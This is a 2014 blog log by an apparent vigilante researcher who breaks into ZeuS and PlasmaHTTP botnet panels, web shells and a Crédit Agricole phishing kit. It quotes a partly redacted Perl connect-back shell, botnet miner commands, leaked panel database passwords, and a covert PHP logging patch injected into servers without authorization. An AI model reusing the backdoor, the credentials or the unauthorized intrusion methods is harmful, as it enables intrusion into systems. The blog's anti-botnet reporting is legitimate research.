Thursday, January 30, 2014

PlasmaHTTP botnet on

PlasmaHTTP botnet and other junk on

Plasma bot is a Windows based malware using HTTP to communicate with Command & Control server. Its primary functions are stealing credentials and DDoS. Not very sophisticated, but it gets the job done for many skids. - Hosting24 Servers, US



Main page:
~450 bots

Running commands:
bot.update java-update.exe [X] 
miner.start *-a scrypt -o stratum+tcp:// -O Djurres.2:x -t 4* [X] 
miner.gpu.start *-a scrypt -o stratum+tcp:// -u Djurres.1 -p x -g yes* [X] 
wait [X]

Real Fact: Mining for Bitcoin has huge profit margins.
CPU and GPU ?!?! Woah bro. 1337.

DDoS? uber cool! 


Password log:

Ok, now this is the pathetic part.
I almost felt bad taking this botnet down.

Yes, that is a directory called "A Hackers Folder"

His pet RAT collection:

And a library of eBooks on how to 'spread' his shitty public copy of Plasma bot. 

I thought I pulled a sample that the update script was running, but I guess not.

bot.update java-update.exe [X] 

Its too late now anyway.

Xzibit says:
actually, you have some eBooks to read ... so sad. hosting ZeuS (2x botnets)

C&C listed on ZeuS Tracker.

(117 bots) - Most from India


OS Stats:

(50 bots) - Most from India

C999shell and Bitcoin miner ELF:

C999 Shell
Awesome c99 mod bro...

WSO 2.5 Shell


Sorry, playtime is over for you. 

Pretty standard, nothing too interesting.

Thursday, January 16, 2014


New ZeuS build has leaked and is starting to be seen in the field.

Same abilities as earlier versions but new "Modules Parser" (iBank)
This new feature scans bot host machines for banking related processes and banking client applications. It hooks these processes and attempts to steal credentials.

Panel found via ZeuS Tracker
ECATEL, Netherlands


Modules parser:

Script running:


VT: (21/46)

List of users:

adminEnabledDefault user


This botnet is run by the same guys seen here:

and here:

This server is now offline.


Monday, January 13, 2014 - shells and DoS and phishing, oh my

Started with a WSO shell. Cracked into it.

Find all sorts of hideous junk on here, including a Credit Agricole (French Bank) phishing kit.
WSO shell
ICH Th3 Unkn0wn MySQL interface
Priv8 shell
Symlink Sa 2 panel
Dangerous Mailer
VNShell DDoS shell
K2LL33d shell shell mod b374k shell,
RootDaBitch tool - brute force local accounts using su - Credit Agricole kit

Ok, lets have a look.

(this was something like the 3rd WSO I found in here...seriously??)

MySQL Interface mod

Priv8 Shell
It literally tells me the password to the shell is 'priv8'

..and the password works. What an ugly piece of garbage too!

Symlink Panel
Symlink shared hosting directories to one place and mass deface.

Domains list, but symlinks arent working. Sorry buddy.
This thing stopped being useful a while ago.

Dangerous Mailer
Login to mailer panel.

Long view of Dangerous Mailer

VNShell Flooder
(because DoS is hacking)
This is the type of stuff they teach you at HackForums.
Oh yeah, and this isn't even a shell even though its called a shell.

Select the attack type

Target, http file, attack time

Does it look like b374k shell (below)? 
Yes, thats because this skilled hacker just changed a few lines of code and called it his own work. 
v3ry sw33t

If your eyes aren't already bleeding, get a load of this.

TurkBlackhats Shell

b374k shell (1923Turk)

This tool brute forces su to gain elevated privileges, uses suCrack.

Directory listing of the kit, showing Bash script, password txt and screenshots?

Oh yes, because I don't know how to run a bash script, nor would there be useful info in the script source code either...sigh.

Not one, but two screenshots!
This one proves that he got in !! Wow cool. Fuck you.
Thanks "The Breacher" that was really helpful to me and my fellow skids. 

(Shake my head)

More things that are not that interesting and pretty useless but someone decided to spend time working on anyway:

PHP mailer, no panel, post method
/*Variaveis do Formulario*/
$nome = trim(@$_POST['nome']);/*recebe os dados digitados no campo "nome"*/
$email = trim(@$_POST['email']);/*recebe os dados digitados no campo "email"*/
$assunto_user = trim(@$_POST['assunto']);/*recebe os dados digitados no campo "assunto"*/
$mensagem = trim(@$_POST['mensagem']);/*recebe os dados digitados no campo "mensagem"*/

Perl back connect
#!/usr/bin/perl      use Socket;      print "Data Cha0s Connect Back Backdoor\n\n";      if (!$ARGV[0]) {        printf "Usage: $0 [Host] <Port>\n";        exit(1);      }      print "[*] Dumping Arguments\n";      $host = $ARGV[0];      $port = 80;      if ($ARGV[1]) {        $port = $ARGV[1];      }      print "[*] Connecting...\n";      $proto = getprotobyname('tcp') || die("Unknown Protocol\n");      [...redacted]        die("Unable to Connect\n");      }      print "[*] Spawning Shell\n";      if (!fork( )) {        [...redatcted]        exec {'/bin/sh'} '-bash' . "\0" x 4;        exit(0);      }      print "[*] Datached\n\n";

Last but not least.

Credit Agricole phishing kit -
Includes js, php, images, etc. for phishing site.
Bad guys redirect victim traffic to a kit like this in an effort to steal login credentials.
Crédit Agricole S.A. is the largest retail banking group in France, second largest in Europe and the eighth largest in the world by Tier 1 capital according to The Banker magazine. 
Phishing pages:

I deleted all of this junk. All the shells, phishing pages, mailers, DoS 'shell'.. all of it.  I emailed the admins too. operacional[at]

Sunday, January 12, 2014

ZeuS -

Found C&C via ZeuS Tracker.

Panel was at:

46 bots
$config['mysql_host'] = 'localhost';
$config['mysql_user'] = 'inlandbe_ama';
$config['mysql_pass'] = '1qaz2wsx';
$config['mysql_db'] = 'inlandbe_ama';

Running script:

Admin was moving bots to ZeuS

This is from the same admins researched here.

a.exe - ZeuS

ZeuS Botnet hosted on:
Linux 2.6.18-194.26.1.el5

network:IP-Network-Block: -

(144 bots)

 OS Statistics

 TLD index is broken Wordpress


(144 bots)
$config['mysql_host']          = 'localhost';
$config['mysql_user']          = 'stn';
$config['mysql_pass']          = '1qaz2wsx';
$config['mysql_db']            = 'stn';

(0 bots)
$config['mysql_host']          = 'localhost';
$config['mysql_user']          = 'stnfrn';
$config['mysql_pass']          = '1qaz2wsx';
$config['mysql_db']            = 'stnfrn';

user_execute hxxp://

Moving to ZeuS


Saturday, January 11, 2014

Patching ZeuS cp.php to track botnet administrators

This "patch" is straightforward. Not the most pretty method but it works for this job.

cp.php is the main control panel page used to administrate a ZeuS botnet. Every time you want to check files for stolen credentials or send commands to the botnet. you would be using cp.php

This being the only php file used for access and administration, will be the best file to patch for tracking.

Looked around on Google because I'm lazy and dont need to reinvent the wheel. I find this: (modified a bit) 

$file = 'sysfile.dat';$ipadress = $_SERVER['REMOTE_ADDR'];$date = date('d/F/Y h:i:s');$webpage = $_SERVER['SCRIPT_NAME'];$url = $_SERVER['REQUEST_URI'];$browser = $_SERVER['HTTP_USER_AGENT'];$fp = fopen($file, 'a');fwrite($fp, $ipadress.' - ['.$date.'] '.$url.' '.$webpage.' '.$browser."\r\n");fclose($fp);

Encode in Base64 to be "stealthy"


Insert this code in cp.php, save, and its now patched and ready to log activity!

Here is an example log for a ZeuS botnet that I was tracking.

ZeuS C&C via Google Dorks and tracking ZeuS Admins -

Over the weekend I found some ZeuS C&Cs using Google.

Most command and control servers found using dorks are offline now, but not all. This one was still active and getting larger.

I had an idea to "patch" cp.php so that I could track the guys who admin this.

ZeuS C&C
Uname: Linux 2.6.18-448.16.1.el5.lve0.8.70PAE

OriginAS:       AS36444, AS2828
NetName:        ACENETMI

3x ZeuS botnets hosted:

(357 bots)
OS Statistics:
Search for Files:

Summary page from last week, showing 331 bots.

Options & Encryption Key:

named botnets: vti, will, txt

hxxp:// (RU language set on Panel)
32 bots, Active since Aug 2013 (txt)
$config['mysql_host'] = 'localhost';
$config['mysql_user'] = 'bitereli_biterel';
$config['mysql_pass'] = 'h7Uu6wpW9A%s';
$config['mysql_db'] = 'bitereli_bitereli

10 bots (will)
$config['mysql_host'] = 'localhost';
$config['mysql_user'] = 'bitereli_bits';
$config['mysql_pass'] = 'Go;vEI-;le94';
$config['mysql_db'] = 'bitereli_biterel';

350+ bots (vti)
$config['mysql_host'] = 'localhost';
$config['mysql_user'] = 'bitereli_admin';
$config['mysql_pass'] = '@ph;yiTpFg}?';
$config['mysql_db'] = 'bitereli_admin';

A shell was here:

Used the shell to patch cp.php as discussed in this post. 

Here is the access log for this ZeuS botnet.

Admin IP and ISP: - Blackberry UK RIM - Blackberry UK RIM - Blackberry UK RIM - AirTel Nigeria - AirTel Nigeria - AirTel Nigeria - Globacom Nigeria - Globacom Nigeria - Globacom Nigeria

We can clearly see who was working on this botnet. We have access from two wireless provider networks in Nigeria, user agent showed Win7 using Firefox, and a Blackberry from the UK.

Law enforcement should be able to use these access logs as evidence against the admins.. or at least give a clue as to who is behind this.

Friday, January 10, 2014

ZeuS hosted on

ZeuS C&C hosted on:

519 bots (315 from India)



 OS Statistics:

Now its 403 Forbidden
Good stuff.